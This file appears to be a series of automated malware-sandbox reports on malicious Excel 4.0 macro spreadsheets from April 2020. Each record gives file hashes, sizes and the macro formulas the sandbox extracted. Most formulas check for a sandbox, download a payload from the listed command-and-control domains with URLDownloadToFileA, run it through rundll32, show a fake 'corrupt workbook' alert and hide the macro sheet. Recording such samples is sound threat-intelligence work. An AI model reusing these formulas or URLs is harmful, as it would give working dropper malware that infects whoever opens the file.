{"version":"0.2","sample":{"sample":"","kind":"file","target":"04146fc91da9badc42eb6f482d52147315c4300aae01dbcdfb235d19e523da02"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"04146fc91da9badc42eb6f482d52147315c4300aae01dbcdfb235d19e523da02","filesize":177152,"md5":"df6d19ae828d9fea6e33d78042aff518","sha1":"73a4cb2e0ea612546772f8ccfbf0fc6974fc7828","sha256":"04146fc91da9badc42eb6f482d52147315c4300aae01dbcdfb235d19e523da02","sha512":"aa9fd62e2023298ae86d4530caf3eed4b972b0195afb18757c1bae31d74a3577e1ba622e54e3e70d6936986baa4ab8676da6300ef5ba5cbea0217216ab0fae7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04146fc91da9badc42eb6f482d52147315c4300aae01dbcdfb235d19e523da02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3H41VxtTye\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0421795ad817f4036585b8c1afe546f20c7cf165bf73f765fb694e29cb427766"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"0421795ad817f4036585b8c1afe546f20c7cf165bf73f765fb694e29cb427766","filesize":177152,"md5":"b52f3ed9b8d97c8d5e12a2aca0b96ecd","sha1":"c2b14a14bb2db779603040d20e8126aa144c438e","sha256":"0421795ad817f4036585b8c1afe546f20c7cf165bf73f765fb694e29cb427766","sha512":"3e5b219ecb6d15b4d5427e588f8c8326cb8bbc6b1c8ea666f8b26d27ec2ad63c9d15ffa7e05ab8e5a83ac805f5aac913d034c9ebaee8ab0491a9e954ca0e4dff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0421795ad817f4036585b8c1afe546f20c7cf165bf73f765fb694e29cb427766.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CDxROTRbsY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04300a5accf347cdb7cbf2dc5e559bdcddd0724d5cac458cf6fc9f2a399cb54a"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"04300a5accf347cdb7cbf2dc5e559bdcddd0724d5cac458cf6fc9f2a399cb54a","filesize":167936,"md5":"7ae907ddbf21c443a3529245ca11c6de","sha1":"6287bcafb246164a3aaeb41d3eaf092603e7db63","sha256":"04300a5accf347cdb7cbf2dc5e559bdcddd0724d5cac458cf6fc9f2a399cb54a","sha512":"f54e4784bebcf3b785cdb95f942430d9b2302727869d7bc3094d82e1bc74a33211d94888457af01fa82033cf66f1ea09d881a11f0b55a2af9ce0ae9020448f52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04300a5accf347cdb7cbf2dc5e559bdcddd0724d5cac458cf6fc9f2a399cb54a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hNG0fMWhq9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0449e0930bb7d9887868805a5b43d747234fbed2ef3a8d366296a025edf6334e"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"0449e0930bb7d9887868805a5b43d747234fbed2ef3a8d366296a025edf6334e","filesize":160768,"md5":"9d4c4fe9666bbade26b37cded04bddbe","sha1":"807af75147ec3d62f5daa26ad7b7fe274ca3553a","sha256":"0449e0930bb7d9887868805a5b43d747234fbed2ef3a8d366296a025edf6334e","sha512":"6661d1e285e8219a8f5471a1ea61fad0158f12e9ba329eb8403bdbf477c2a6c8f32d79f3512dd1b130cc645cbb872004e1a6b3c6863c11b8c8d305b00dd2ad38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0449e0930bb7d9887868805a5b43d747234fbed2ef3a8d366296a025edf6334e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"A73Ht5KGq7\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"044e2d7ec964ffe61a15b16a3963c9d8be92e6c386244d17c262c2b8f1115dfa"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"044e2d7ec964ffe61a15b16a3963c9d8be92e6c386244d17c262c2b8f1115dfa","filesize":141824,"md5":"19ee4700962453a2342b8e230211e4c7","sha1":"70ceaabb2bd15f54aadf3020b910a294ae8cfa39","sha256":"044e2d7ec964ffe61a15b16a3963c9d8be92e6c386244d17c262c2b8f1115dfa","sha512":"c103dd15dc1b55d48ff61b5b789eb5a92d350daec4dcfcac9605b92e3894b8ff1f535e479bc5bde979bf0f774f530d3e32c31bea37ef0e5361ab28c3c3efed67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"044e2d7ec964ffe61a15b16a3963c9d8be92e6c386244d17c262c2b8f1115dfa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"rzVru7Ba5Z\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"045c9e5a08cab6fb65b0cdfbd3c69cc9d1df0458659c7f11e945e9e4a2544c68"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"045c9e5a08cab6fb65b0cdfbd3c69cc9d1df0458659c7f11e945e9e4a2544c68","filesize":132608,"md5":"db09dae8b3d707e51fcbb9c305ab98d5","sha1":"99fd198b57fdf5da0af6fd6886ba3e718ed478ef","sha256":"045c9e5a08cab6fb65b0cdfbd3c69cc9d1df0458659c7f11e945e9e4a2544c68","sha512":"5f62c9383ff4139d1c7641cbda3ffa2d1ac44e122107dc624b969e89c6e32ebe73573ee304a4543abdb023d38bec92f48f3a7f350d81bdc6ed617320830792d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"045c9e5a08cab6fb65b0cdfbd3c69cc9d1df0458659c7f11e945e9e4a2544c68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ETOQIeZwCM\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"046602fa0a85f8ca0a0db3bd18cdc2152ce752918b033d70a0f6a9d07c861d69"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"046602fa0a85f8ca0a0db3bd18cdc2152ce752918b033d70a0f6a9d07c861d69","filesize":167936,"md5":"e76966178a47d16f7ee667215e11c9b4","sha1":"671f887090ff574d963fb87e5af31b7b7a0fc42b","sha256":"046602fa0a85f8ca0a0db3bd18cdc2152ce752918b033d70a0f6a9d07c861d69","sha512":"9a5cf5713dd0979c6bd7444bf9a658460e238424471642bbe7d18454effb7f03c9b3d93115655d9bb7a01213b4fbb40e09d85894c816fa34b7177fb59e89f732","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"046602fa0a85f8ca0a0db3bd18cdc2152ce752918b033d70a0f6a9d07c861d69.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y21cIiJMG6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"047052f9d141a100ce8af00f60cc644450a08704ec1240e105a2eb6c5c1093c7"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"047052f9d141a100ce8af00f60cc644450a08704ec1240e105a2eb6c5c1093c7","filesize":167936,"md5":"d7b1d21462fe0db0622ed52f897571c9","sha1":"becbe9053143291fc221cd3ea4240e45719b429f","sha256":"047052f9d141a100ce8af00f60cc644450a08704ec1240e105a2eb6c5c1093c7","sha512":"a45b8860fa3ea812effa7ccaa9f4d8b1e158a16033df05a8e5e4ff063dc39cd1658cb7c9357050df67ad3c903ddc28090a6b8bee4404014d63baa4710b4bdf7a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"047052f9d141a100ce8af00f60cc644450a08704ec1240e105a2eb6c5c1093c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nwuEIFlr5m\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0474c5dc0baeb3469b36f0259f3a98791af3669484fdbc3bb9cf3255e1e1ffb4"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0474c5dc0baeb3469b36f0259f3a98791af3669484fdbc3bb9cf3255e1e1ffb4","filesize":185344,"md5":"804f3f7159822b9c1345531e6989781c","sha1":"bf41b5f79d434b171220e85ccd18a8c61a8a03e7","sha256":"0474c5dc0baeb3469b36f0259f3a98791af3669484fdbc3bb9cf3255e1e1ffb4","sha512":"58400444a369ac5be7ba2944ff263114959da191d9976b592cf7dc70b868a403fbdd5b494461da3e6d4ef42be5ae7be843992091db50f5739d3ffb5272cedad4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0474c5dc0baeb3469b36f0259f3a98791af3669484fdbc3bb9cf3255e1e1ffb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04877b1feff16a20c2b87046f0a3a0075c1a2592a850825d1734c6be7e467ef7"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04877b1feff16a20c2b87046f0a3a0075c1a2592a850825d1734c6be7e467ef7","filesize":130048,"md5":"4682a77dc2d3858bd7d310fd49427dd8","sha1":"a115f29274aeeb02031216ed422be827e1c2fd14","sha256":"04877b1feff16a20c2b87046f0a3a0075c1a2592a850825d1734c6be7e467ef7","sha512":"b413979892288c3f9ace352e590d8a3f3c6de23310bbe5364acd5db2d9607bfb82d741439f2937387118aa14d418c85f0050cc6cc9a6185c93276baaebdd7222","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04877b1feff16a20c2b87046f0a3a0075c1a2592a850825d1734c6be7e467ef7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://wgyafqtc.online/sgfbsb4"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://wgyafqtc.online/sgfbsb4\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nGOTO(R$0C$10)\nRETURN()\nWORKBOOK.HIDE(\"tkAvJ721H3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0489219299cc04c4f21a3d7e2fc7179b1d6cee2afdc8a6e41a38dafdee7444e1"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0489219299cc04c4f21a3d7e2fc7179b1d6cee2afdc8a6e41a38dafdee7444e1","filesize":206336,"md5":"66eae92658d4a0a56c975aeeebf07fe9","sha1":"23ae15b3ad75fda34a2588ab9229a6875a72186d","sha256":"0489219299cc04c4f21a3d7e2fc7179b1d6cee2afdc8a6e41a38dafdee7444e1","sha512":"63b43c5b2ca91b6acaccc9b935299db919ead779fc2d8baeb121fed45830850d3d1eaae737e99753c776154df5315b5b1fbcff197746ee9a09beb23fc73b7990","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0489219299cc04c4f21a3d7e2fc7179b1d6cee2afdc8a6e41a38dafdee7444e1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2l3KykuxTO\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0496514d89eaf90629e907243cae7b63d4bc39662d3eb070bbe6cb369fd30a5d"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0496514d89eaf90629e907243cae7b63d4bc39662d3eb070bbe6cb369fd30a5d","filesize":185344,"md5":"2bb33b556c022feb0a150d3f4569320d","sha1":"3fd3d4d5020e3beecc0cbed920bcc3838829af92","sha256":"0496514d89eaf90629e907243cae7b63d4bc39662d3eb070bbe6cb369fd30a5d","sha512":"8be78c3d3cbff39774c2cd849ca63e1bc7fbe9bb54eb67965857a8598cf571f0fff25f62df19515af2f295ef14d026d627d06c38d29c85e6fd6237eb9ff47535","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0496514d89eaf90629e907243cae7b63d4bc39662d3eb070bbe6cb369fd30a5d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"049b55d1253d90b3c758a671ff8dfa86725b5c7e423dbe3f182be9d4a78178b9"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"049b55d1253d90b3c758a671ff8dfa86725b5c7e423dbe3f182be9d4a78178b9","filesize":141312,"md5":"a14eda130a6b61a202139e44824cb176","sha1":"52534acb1da84cd83e2fd4e10fa1b0e8ad4ae430","sha256":"049b55d1253d90b3c758a671ff8dfa86725b5c7e423dbe3f182be9d4a78178b9","sha512":"d2a2ad15c1b657ec2d81c1eb191df64e527f2270cd0ee29a14dfed3a8aca86908533567875b61d169d56c3a52079528507379cf8205e117ce1b82c8313b6c6c3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"049b55d1253d90b3c758a671ff8dfa86725b5c7e423dbe3f182be9d4a78178b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"MPLEI5357E\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04c0f8c69fb91c0ae7a7fcfd098c26e60aaa88876ebf0378a9fee55d5ee6269f"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04c0f8c69fb91c0ae7a7fcfd098c26e60aaa88876ebf0378a9fee55d5ee6269f","filesize":152576,"md5":"ecb514a57cffc1c5935ca74e50150c64","sha1":"3900ae83b9d0ead111f1179826e718538dcae1fa","sha256":"04c0f8c69fb91c0ae7a7fcfd098c26e60aaa88876ebf0378a9fee55d5ee6269f","sha512":"d998409a27b4040a5d1541d48300c10f550fd541ac9fa4ddfeb130e0ec1b8fa1f3c91352fc33c672fc88f3d44bed43d8399ab1a4ec34f2249202ac610fb8050e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04c0f8c69fb91c0ae7a7fcfd098c26e60aaa88876ebf0378a9fee55d5ee6269f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BRa3VbrHQx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04d65c8ff875ebefb7270f673872cec1dad80f123d0c3b7f41eef1c2bc1c4bb8"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04d65c8ff875ebefb7270f673872cec1dad80f123d0c3b7f41eef1c2bc1c4bb8","filesize":167936,"md5":"3f5129af2917cc9693edf7cea8e4880a","sha1":"b0d9c62c85df0e0f3c231826874775677ed3bc70","sha256":"04d65c8ff875ebefb7270f673872cec1dad80f123d0c3b7f41eef1c2bc1c4bb8","sha512":"b89e9a006ce58a54341a54ee3b9b081e3cbf00c8aa5759d8727ef35ee0e8656dc39fedd2b485f812ba40379bfdb400e2ec581fc52a99b362fa4f6d55c2b56420","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04d65c8ff875ebefb7270f673872cec1dad80f123d0c3b7f41eef1c2bc1c4bb8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VpVkeowulQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04d7c73883111482fc15d725195415269ea6c74c3609b1da212bb32c9bc0d74b"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04d7c73883111482fc15d725195415269ea6c74c3609b1da212bb32c9bc0d74b","filesize":167936,"md5":"958dd136d32c948d087e9d78f30b4e40","sha1":"c80ceb392eacb17424b1412de57ecee2d22c4ac5","sha256":"04d7c73883111482fc15d725195415269ea6c74c3609b1da212bb32c9bc0d74b","sha512":"bcb1f02c0b3a34cf94b56425596614715508055c6036ef896e7df17e15e6707d6eb8dab6bb9b27e19ca532d57af4dabf4739491a640ed76f29dd7e9166fac897","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04d7c73883111482fc15d725195415269ea6c74c3609b1da212bb32c9bc0d74b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z2mLqgbxqS\",TRUE)\nGOTO(R$0C$19)"}}}]}
